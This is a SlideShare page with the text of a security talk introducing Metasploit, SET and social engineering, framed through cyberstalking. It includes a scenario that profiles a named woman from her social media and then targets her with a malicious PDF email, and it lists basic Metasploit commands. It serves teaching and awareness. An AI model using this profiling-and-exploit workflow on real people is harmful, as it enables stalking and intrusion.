Tiago Henriques, profile picture
Uploaded byTiago Henriques
PPTX, PDF2,048 views

Practical exploitation and social engineering

This document provides an overview of a presentation on practical exploitation and cyberstalking. The presentation introduces tools like Metasploit and Social Engineering Toolkit (SET) and demonstrates how they can be used for both legal and illegal purposes, like cyberstalking. It discusses how easy it is to profile and target individuals online to steal identities or spread misinformation. The document emphasizes that while hacking can be fun, the implications of cyberstalking should be taken seriously due to its potential real-world consequences.

Embed presentation

Downloaded 176 times
Practical Exploitation: Introduction to Metasploit, Social Engineering and a few other tools
SpeakersBSc, MSc, CEH, CHFI,thought I was going to be a PhD decided to become a ninja instead.BSc, MSc-Now works for ABBANBreaking servers, sip trunks, and doing research into VoIP and IMS
Synopsis – wrong order, all contentIntroduction to practical exploitationIntroduction to cyberstalkingIntroduction to Metasploit(short) History of metasploitModulesExploitsPayloadsToolsMetasploit fundamentalsVulnerability ScanningMSF Databases commandsClient side exploitsPost ExploitationMeterpreter ArmitageSocial EngineeringSETTypes of attacksInfection MediaPractical workshopPs: I know you have high hopes that it will go by this order, but it wont, we are not that organized, and apologize in advance.
WorkshopDuring the practical workshop, you will work in pairs, you will be given an IP address to a virtual machine.The objective of this workshop is very simplePWN the living crap out of these virtual machines using techniques that were taught to you during this presentation and read the file password.txt located at Windows/System32 or /home/just4meeting (depending if you get a windows box or a linux box), and sucessfully create your own account on the remote system.
Seriouz BusinessWhen presenting, we like to talk about both the fun side of things and the bit about serious implications these “fun things” can have in life.During this presentation you will hear a bit about cyberstalking and how these tools work from a cyberstalker perspective and a victim.To write this part of the presentation we worked along side with the brand new UK National Center for Cyberstalking Research, they are cool people and provided us with lots of data and information.http://www.beds.ac.uk/nccr/news
Practical exploitationQ:What do we call practical exploitation?On the interwebz you can find many definitions created by “security professionals”, we are not (security professionals), so here is our definition of practical exploitation:Get root and learn how to use current tools to automate and increase the speed when doing a penetration test. Understand how to use the tools past a script kiddie level – aka being able to extend the tool code if needed or combine multiple tools to achieve a target (!!root!!)
CyberstalkingQ: What is CYBERSTALKING?A: Cyberstalking is the use of internet and/or other electronic means to stalk or harass an individual. However cyberstalking can be legal and illegal.(To be explained further)
CyberstalkingQ: Who practices cyberstalking?YouMe
Cyberstalking“I’VE NEVER CYBERSTALKED!!!!one!!!eleven!!”
CyberstalkingRemember when 2 slides back we said cyberstalking could be both legal and illegal ? This is what we meant...Lets go through a scenario where Cyberstalking would be legal!
CyberstalkingMeet Tiago:As you can see, Tiago is ur average 23 year old stud, he likes to go out and party, when he does so he meetssssssssssssss
CyberstalkingGIRLS!However....
CyberstalkingTiago has certain things he likes in girls and things he dislikes!Tiago like more then 500million people has a facebook accountSo Tiago goes and does a bit of Cyberstalking to decide which girls he wants to be friends with or not. Or even possible future girlfriends.
CyberstalkingEven without adding these girls to facebook he gets plenty information sometimes to decide if he wants to go further with them.
CyberstalkingSo, as you can see this is an example of a situation where cyberstalking is perfectly acceptable and legal. You access public information about someone that is in the “cyber” world.This is also an action done sometimes by companies that are considering hiring a certain person, to get some background information on the person.
CyberstalkingHOWEVER
Cyberstalking – Scenario 2Tiago also knows his way around computers and specifically security and the tools used in infosec. He also knows how to check securitytube and common security websites for different types of attacks.BLACKHAT ON!
Cyberstalking – Scenario 2Analyzing the profiles Tiago decides he wants to go further and know a bit too much about one of these girls.
ProfilingTiago starts by getting all sorts of information he can on this girl that might be useful in any way:From the facebook profile we get that:Her name is Anna KonovaShe is both a Chelsea and Barça fanShe likes Burberry, fashion events, dominoes pizza, and something called SIFEHer favorite music: MJ, Lady gaga, Beyoncé, Alicia Keys, Cheryl ColeUsing the information collected from this facebook profile we go to google...
Profiling<<- OH LOOK THE SIFE THINGQuite a few results lets have a look at a few....
ProfilingFrom the facebook profile we get that:Her name is Anna KonovaShe is both a Chelsea and Barça fanShe likes Burberry, fashion events, dominoes pizza, and something called SIFEHer favorite music: MJ, Lady gaga, Beyoncé, Alicia Keys, Cheryl ColeFrom twitter we get 0From linkedIN:Project manager at Innovate Went to University of BedfordshireIs looking for new career opportunities etc etc etcSIFE - SIFE is an international non-profit organization that works with leaders in business and higher education to mobilize university students to make a difference in their communities while developing the skills to become socially responsible business leaders.
Going over the lineHow can all this simple, easily accesible information help Tiago cyberstalk someone?Well let me introduce you to METASPLOIT.
DEMO 1 – PDF + EmailDEMO
DEMO 1 – PDF + EmailAs you can see it wasn’t an attack hard to setup and easily a real life scenario.For those of you that find that attack complicated, we have something for you later on....
A bit more on cyberstalking....Following we will present some data that was provided to us by the Research Center!  coz stats are always fun n giggles!
StatsHarrasser – Environment where they are first met
StatsHarrasser – Description
StatsFears experienced by those who are harassed
StatsConsequences on those being harrased
Types of attacksIdentity theft – controlling victim’s credentials
Posting false profiles
Posing as the victim and attacking others
Discrediting in online communities
Discrediting victim in workplace
Direct threats through email/instant messaging
Constructing websites targeting the victim
Transferring attack to victim’s relatives
Use of the victim’s image
Provoking others to attack the victim
Following the victim in cyberspaceToolsSo what other tools does a cyberstalker have that are easily accesible and with a high ease of use?SETMetasploitEvilgrade
MetasploitExploitation frameworkLots of other tools and utilitiesFirst written in PERLThen changed to RUBY (THANK GOD)3 versions – Pro, Express, free
Metasploit nowadays...We wont be able to look at all the different components so we will try to focus on the more commonly used ones.
Metasploit - Starting
Metasploit - InteractionThere are many ways a user can access metasploit features:Msfconsole
msfGUI
msfWEB
ArmitageMetasploit - MSFconsole
Metasploit - MSFGui
Metasploit - MSFWeb
Metasploit - Armitage
Metasploit – Main ModulesExploits – Main module – used to pwn shit! :]Encoders – Used to transform raw versions of payloadsPayload – Used to connect to the shit u pwn!
Metasploit – Quick IntroStep 1 – Open msfconsoleStep 2 – Choose exploitStep 3 – Configure exploit and payloadStep 4 – exploit!
Metasploit – Intro DEMODEMO 0

More Related Content

PDF
BlueHat v18 || MSRC listens
byBlueHat Security Conference
 
PDF
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
byMazin Ahmed
 
PDF
Hacker halted2
bysamsniderheld
 
PDF
Hack the book Mini
byKhairi Aiman
 
ODT
Who's that knocking on my firewall door?
byBruce Wolfe
 
PPT
Thane Barnier MACE 2016 presentation
byJeff Zahn
 
PPT
Thou shalt not
bytaftosterone
 
PPTX
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
byMazin Ahmed
 
BlueHat v18 || MSRC listens
byBlueHat Security Conference
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
byMazin Ahmed
 
Hacker halted2
bysamsniderheld
 
Hack the book Mini
byKhairi Aiman
 
Who's that knocking on my firewall door?
byBruce Wolfe
 
Thane Barnier MACE 2016 presentation
byJeff Zahn
 
Thou shalt not
bytaftosterone
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
byMazin Ahmed
 

What's hot

PDF
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
byNETWAYS
 
PPTX
Bug Bounty - Play For Money
byShubham Gupta
 
PDF
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
byAbhinav Mishra
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PDF
Hackfest presentation.pptx
byPeter Yaworski
 
PPT
Hackers The Anarchists Of Our Time
byUtkarsh Sengar
 
PPT
Security for javascript
byHữu Đại
 
PPT
Web bugs prez
byrounders
 
OSDC 2014: Michael Renner - Secure encryption in a wiretapped future
byNETWAYS
 
Bug Bounty - Play For Money
byShubham Gupta
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
byAbhinav Mishra
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
Hackfest presentation.pptx
byPeter Yaworski
 
Hackers The Anarchists Of Our Time
byUtkarsh Sengar
 
Security for javascript
byHữu Đại
 
Web bugs prez
byrounders
 

Viewers also liked

PPTX
Secure coding - Balgan - Tiago Henriques
byTiago Henriques
 
PPTX
Vulnerability, exploit to metasploit
byTiago Henriques
 
PPTX
Confraria 28-feb-2013 mesa redonda
byTiago Henriques
 
PPTX
Country domination - Causing chaos and wrecking havoc
byTiago Henriques
 
PPTX
Enei
byTiago Henriques
 
PPTX
How to dominate a country
byTiago Henriques
 
PPT
Talkj4mshare
byTiago Henriques
 
Secure coding - Balgan - Tiago Henriques
byTiago Henriques
 
Vulnerability, exploit to metasploit
byTiago Henriques
 
Confraria 28-feb-2013 mesa redonda
byTiago Henriques
 
Country domination - Causing chaos and wrecking havoc
byTiago Henriques
 
Enei
byTiago Henriques
 
How to dominate a country
byTiago Henriques
 
Talkj4mshare
byTiago Henriques
 

Similar to Practical exploitation and social engineering

PPSX
Unit 2
byJigarthacker
 
PPSX
Unit 2
byJigarthacker
 
PDF
Cyber Attack Methodologies
byGeeks Anonymes
 
PPTX
hacking
byADAIKKAPPANS1
 
PDF
01_Metasploit - The Elixir of Network Security
byHarish Chaudhary
 
PDF
Hack Attack! An Introduction to Penetration Testing
bySteve Phillips
 
PPTX
cyber security module 2 ppt of first year
byMayuraD1
 
PPTX
UNIT 5 (2).pptx
byjanani603976
 
PPTX
34088.Chapter-2.pptx
byNAVEEN128672
 
PDF
Ch 4: Footprinting and Social Engineering
bySam Bowne
 
PPTX
Module 2_ Cyber offenses & Cybercrime.pptx
bynikshaikh786
 
PPTX
Ethical hacking
byNaveen Sihag
 
PDF
Cyber Security notes on security on safety.pdf
bySantoshChinchali1
 
PPTX
455845434-Chapter-2-Cyber-Security-pptx.pptx
byDrVPadmavathiAssocia
 
PPTX
Ethical hacking
byMd Mudassir
 
PPT
Cyber crime
byPardeep Kumar
 
PPTX
Cyberstalking CyberstalkingCyberstalking
byhannahroseline2
 
PPT
unit 2. cyber offences_how criminals plan them.ppt
byDimple Relekar
 
PPT
2hacking.ppt
byLatinaLatina1
 
PDF
Practical mitm for_pentesters
byJonathan Cran
 
Unit 2
byJigarthacker
 
Unit 2
byJigarthacker
 
Cyber Attack Methodologies
byGeeks Anonymes
 
hacking
byADAIKKAPPANS1
 
01_Metasploit - The Elixir of Network Security
byHarish Chaudhary
 
Hack Attack! An Introduction to Penetration Testing
bySteve Phillips
 
cyber security module 2 ppt of first year
byMayuraD1
 
UNIT 5 (2).pptx
byjanani603976
 
34088.Chapter-2.pptx
byNAVEEN128672
 
Ch 4: Footprinting and Social Engineering
bySam Bowne
 
Module 2_ Cyber offenses & Cybercrime.pptx
bynikshaikh786
 
Ethical hacking
byNaveen Sihag
 
Cyber Security notes on security on safety.pdf
bySantoshChinchali1
 
455845434-Chapter-2-Cyber-Security-pptx.pptx
byDrVPadmavathiAssocia
 
Ethical hacking
byMd Mudassir
 
Cyber crime
byPardeep Kumar
 
Cyberstalking CyberstalkingCyberstalking
byhannahroseline2
 
unit 2. cyber offences_how criminals plan them.ppt
byDimple Relekar
 
2hacking.ppt
byLatinaLatina1
 
Practical mitm for_pentesters
byJonathan Cran
 

More from Tiago Henriques

PDF
BinaryEdge - Security Data Metrics and Measurements at Scale - BSidesLisbon 2015
byTiago Henriques
 
PPTX
Presentation Brucon - Anubisnetworks and PTCoresec
byTiago Henriques
 
PPTX
Hardware hacking 101
byTiago Henriques
 
PPT
Codebits 2010
byTiago Henriques
 
PDF
Booklet
byTiago Henriques
 
PDF
I FOR ONE WELCOME OUR NEW CYBER OVERLORDS! AN INTRODUCTION TO THE USE OF MACH...
byTiago Henriques
 
PDF
BSides Lisbon - Data science, machine learning and cybersecurity
byTiago Henriques
 
PDF
BSides Lisbon 2023 - AI in Cybersecurity.pdf
byTiago Henriques
 
PDF
Pixels Camp 2017 - Stranger Things the internet version
byTiago Henriques
 
PDF
Codebits 2014 - Secure Coding - Gamification and automation for the win
byTiago Henriques
 
PPTX
Workshop
byTiago Henriques
 
PDF
The state of cybersecurity in Switzerland - FinTechDay 2017
byTiago Henriques
 
PPTX
Preso fcul
byTiago Henriques
 
PDF
Webzurich - The State of Web Security in Switzerland
byTiago Henriques
 
PDF
Pixels Camp 2017 - Stories from the trenches of building a data architecture
byTiago Henriques
 
PDF
(Mis)trusting and (ab)using ssh
byTiago Henriques
 
BinaryEdge - Security Data Metrics and Measurements at Scale - BSidesLisbon 2015
byTiago Henriques
 
Presentation Brucon - Anubisnetworks and PTCoresec
byTiago Henriques
 
Hardware hacking 101
byTiago Henriques
 
Codebits 2010
byTiago Henriques
 
Booklet
byTiago Henriques
 
I FOR ONE WELCOME OUR NEW CYBER OVERLORDS! AN INTRODUCTION TO THE USE OF MACH...
byTiago Henriques
 
BSides Lisbon - Data science, machine learning and cybersecurity
byTiago Henriques
 
BSides Lisbon 2023 - AI in Cybersecurity.pdf
byTiago Henriques
 
Pixels Camp 2017 - Stranger Things the internet version
byTiago Henriques
 
Codebits 2014 - Secure Coding - Gamification and automation for the win
byTiago Henriques
 
Workshop
byTiago Henriques
 
The state of cybersecurity in Switzerland - FinTechDay 2017
byTiago Henriques
 
Preso fcul
byTiago Henriques
 
Webzurich - The State of Web Security in Switzerland
byTiago Henriques
 
Pixels Camp 2017 - Stories from the trenches of building a data architecture
byTiago Henriques
 
(Mis)trusting and (ab)using ssh
byTiago Henriques
 

Recently uploaded

PPT
software-security-intro in information security.ppt
byismaeelsahib032
 
PDF
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PPTX
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
PPTX
AI's Impact on Cybersecurity - Challenges and Opportunities
byYasir Naveed Riaz
 
PPTX
cybercrime in Information security .pptx
byismaeelsahib032
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PPTX
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
PDF
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
PDF
Unser Jahresrückblick – MarvelClient in 2025
bypanagenda
 
PDF
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
PPTX
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
PDF
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
PDF
December Patch Tuesday
byIvanti
 
PDF
Lab 1.5 - Sharing Secrets with GPG ~ 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PPTX
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
PDF
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
PDF
API-First Architecture in Financial Systems
bycyy111112
 
DOCX
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
PDF
Energy Storage Landscape Clean Energy Ministerial
bySurajitBanerjee38
 
PDF
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
software-security-intro in information security.ppt
byismaeelsahib032
 
Day 5 - Red Team + Blue Team in the Cloud - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Cybersecurity Best Practices - Step by Step guidelines
byYasir Naveed Riaz
 
AI's Impact on Cybersecurity - Challenges and Opportunities
byYasir Naveed Riaz
 
cybercrime in Information security .pptx
byismaeelsahib032
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
Unser Jahresrückblick – MarvelClient in 2025
bypanagenda
 
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
December Patch Tuesday
byIvanti
 
Lab 1.5 - Sharing Secrets with GPG ~ 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Unit-4-ARTIFICIAL NEURAL NETWORKS.pptx ANN ppt Artificial neural network
byssuserd4481a
 
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
API-First Architecture in Financial Systems
bycyy111112
 
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
Energy Storage Landscape Clean Energy Ministerial
bySurajitBanerjee38
 
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 

Practical exploitation and social engineering

  • 1.
    Practical Exploitation: Introductionto Metasploit, Social Engineering and a few other tools
  • 2.
    SpeakersBSc, MSc, CEH,CHFI,thought I was going to be a PhD decided to become a ninja instead.BSc, MSc-Now works for ABBANBreaking servers, sip trunks, and doing research into VoIP and IMS
  • 3.
    Synopsis – wrongorder, all contentIntroduction to practical exploitationIntroduction to cyberstalkingIntroduction to Metasploit(short) History of metasploitModulesExploitsPayloadsToolsMetasploit fundamentalsVulnerability ScanningMSF Databases commandsClient side exploitsPost ExploitationMeterpreter ArmitageSocial EngineeringSETTypes of attacksInfection MediaPractical workshopPs: I know you have high hopes that it will go by this order, but it wont, we are not that organized, and apologize in advance.
  • 4.
    WorkshopDuring the practicalworkshop, you will work in pairs, you will be given an IP address to a virtual machine.The objective of this workshop is very simplePWN the living crap out of these virtual machines using techniques that were taught to you during this presentation and read the file password.txt located at Windows/System32 or /home/just4meeting (depending if you get a windows box or a linux box), and sucessfully create your own account on the remote system.
  • 5.
    Seriouz BusinessWhen presenting,we like to talk about both the fun side of things and the bit about serious implications these “fun things” can have in life.During this presentation you will hear a bit about cyberstalking and how these tools work from a cyberstalker perspective and a victim.To write this part of the presentation we worked along side with the brand new UK National Center for Cyberstalking Research, they are cool people and provided us with lots of data and information.http://www.beds.ac.uk/nccr/news
  • 6.
    Practical exploitationQ:What dowe call practical exploitation?On the interwebz you can find many definitions created by “security professionals”, we are not (security professionals), so here is our definition of practical exploitation:Get root and learn how to use current tools to automate and increase the speed when doing a penetration test. Understand how to use the tools past a script kiddie level – aka being able to extend the tool code if needed or combine multiple tools to achieve a target (!!root!!)
  • 7.
    CyberstalkingQ: What isCYBERSTALKING?A: Cyberstalking is the use of internet and/or other electronic means to stalk or harass an individual. However cyberstalking can be legal and illegal.(To be explained further)
  • 8.
  • 9.
  • 10.
    CyberstalkingRemember when 2slides back we said cyberstalking could be both legal and illegal ? This is what we meant...Lets go through a scenario where Cyberstalking would be legal!
  • 11.
    CyberstalkingMeet Tiago:As youcan see, Tiago is ur average 23 year old stud, he likes to go out and party, when he does so he meetssssssssssssss
  • 12.
  • 13.
    CyberstalkingTiago has certainthings he likes in girls and things he dislikes!Tiago like more then 500million people has a facebook accountSo Tiago goes and does a bit of Cyberstalking to decide which girls he wants to be friends with or not. Or even possible future girlfriends.
  • 14.
    CyberstalkingEven without addingthese girls to facebook he gets plenty information sometimes to decide if he wants to go further with them.
  • 15.
    CyberstalkingSo, as youcan see this is an example of a situation where cyberstalking is perfectly acceptable and legal. You access public information about someone that is in the “cyber” world.This is also an action done sometimes by companies that are considering hiring a certain person, to get some background information on the person.
  • 16.
  • 17.
    Cyberstalking – Scenario2Tiago also knows his way around computers and specifically security and the tools used in infosec. He also knows how to check securitytube and common security websites for different types of attacks.BLACKHAT ON!
  • 18.
    Cyberstalking – Scenario2Analyzing the profiles Tiago decides he wants to go further and know a bit too much about one of these girls.
  • 19.
    ProfilingTiago starts bygetting all sorts of information he can on this girl that might be useful in any way:From the facebook profile we get that:Her name is Anna KonovaShe is both a Chelsea and Barça fanShe likes Burberry, fashion events, dominoes pizza, and something called SIFEHer favorite music: MJ, Lady gaga, Beyoncé, Alicia Keys, Cheryl ColeUsing the information collected from this facebook profile we go to google...
  • 20.
    Profiling<<- OH LOOKTHE SIFE THINGQuite a few results lets have a look at a few....
  • 21.
    ProfilingFrom the facebookprofile we get that:Her name is Anna KonovaShe is both a Chelsea and Barça fanShe likes Burberry, fashion events, dominoes pizza, and something called SIFEHer favorite music: MJ, Lady gaga, Beyoncé, Alicia Keys, Cheryl ColeFrom twitter we get 0From linkedIN:Project manager at Innovate Went to University of BedfordshireIs looking for new career opportunities etc etc etcSIFE - SIFE is an international non-profit organization that works with leaders in business and higher education to mobilize university students to make a difference in their communities while developing the skills to become socially responsible business leaders.
  • 22.
    Going over thelineHow can all this simple, easily accesible information help Tiago cyberstalk someone?Well let me introduce you to METASPLOIT.
  • 23.
    DEMO 1 –PDF + EmailDEMO
  • 24.
    DEMO 1 –PDF + EmailAs you can see it wasn’t an attack hard to setup and easily a real life scenario.For those of you that find that attack complicated, we have something for you later on....
  • 25.
    A bit moreon cyberstalking....Following we will present some data that was provided to us by the Research Center!  coz stats are always fun n giggles!
  • 26.
    StatsHarrasser – Environmentwhere they are first met
  • 27.
  • 28.
    StatsFears experienced bythose who are harassed
  • 29.
  • 30.
    Types of attacksIdentitytheft – controlling victim’s credentials
  • 31.
  • 32.
    Posing as thevictim and attacking others
  • 33.
  • 34.
  • 35.
    Direct threats throughemail/instant messaging
  • 36.
  • 37.
    Transferring attack tovictim’s relatives
  • 38.
    Use of thevictim’s image
  • 39.
    Provoking others toattack the victim
  • 40.
    Following the victimin cyberspaceToolsSo what other tools does a cyberstalker have that are easily accesible and with a high ease of use?SETMetasploitEvilgrade
  • 41.
    MetasploitExploitation frameworkLots ofother tools and utilitiesFirst written in PERLThen changed to RUBY (THANK GOD)3 versions – Pro, Express, free
  • 42.
    Metasploit nowadays...We wontbe able to look at all the different components so we will try to focus on the more commonly used ones.
  • 43.
  • 44.
    Metasploit - InteractionThereare many ways a user can access metasploit features:Msfconsole
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
    Metasploit – MainModulesExploits – Main module – used to pwn shit! :]Encoders – Used to transform raw versions of payloadsPayload – Used to connect to the shit u pwn!
  • 52.
    Metasploit – QuickIntroStep 1 – Open msfconsoleStep 2 – Choose exploitStep 3 – Configure exploit and payloadStep 4 – exploit!
  • 53.
  • 54.
  • 55.
    Metasploit - Essentialsusemodule- start configuring moduleshow options - show configurable options set varnamevalue - set optionexploit - launch exploit modulerun - launch non-exploitsessions –i n - interact with a sessionhelp command - get help for a command
  • 56.
  • 57.
    But but but...Ama lazy bastard and I think all the methods uve shown me are too hard 
  • 58.
  • 59.
    MeterpreterMeterpreter is COOLMeterpreteris VERY COOLMeterpreter because of a thing called RAILGUN = Full access to windows APIWhat does that mean? This is what it means... You cyberstalkers!
  • 60.
  • 61.
    Back to seriouzThisis all good fun, but shows how easy you can “pwn” and cyberstalk some1 or even be cyberstalked. Advices are the usual: Anti virus updated, Software updated, Firewalls up and running (However that probably wont do you much)2 best advices I can give:Do not read PDF’s, or if u do read them inside google chrome (coz at least ur sandboxed n shit :D )ANDDDDDDDDDDD
  • 62.
  • 63.
    KUDOSFILIPE REIS!!!!!!! ONEELEVEN!!!!! And more FILIPE REIS! He helped recording the demos and is awesome. Center for Research on Cyberstalking for the data providedThe girls for accepting that we had to stay up late. Oh and Chris Bockermann, Bruno Morisson and Oli for allowing me to go home yesterday to write these slides instead of getting us drunk.
  • 64.

Editor's Notes

  • #23 Play DEMO 0
  • #24 DEMO 1 – PDFDEMO 1 - EMAIL
  • #43 Play DEMO 0
  • #48 DEMO 3 – Armitage FINAL
  • #50 DEMO 2 – KEYBDDEMO 2 - C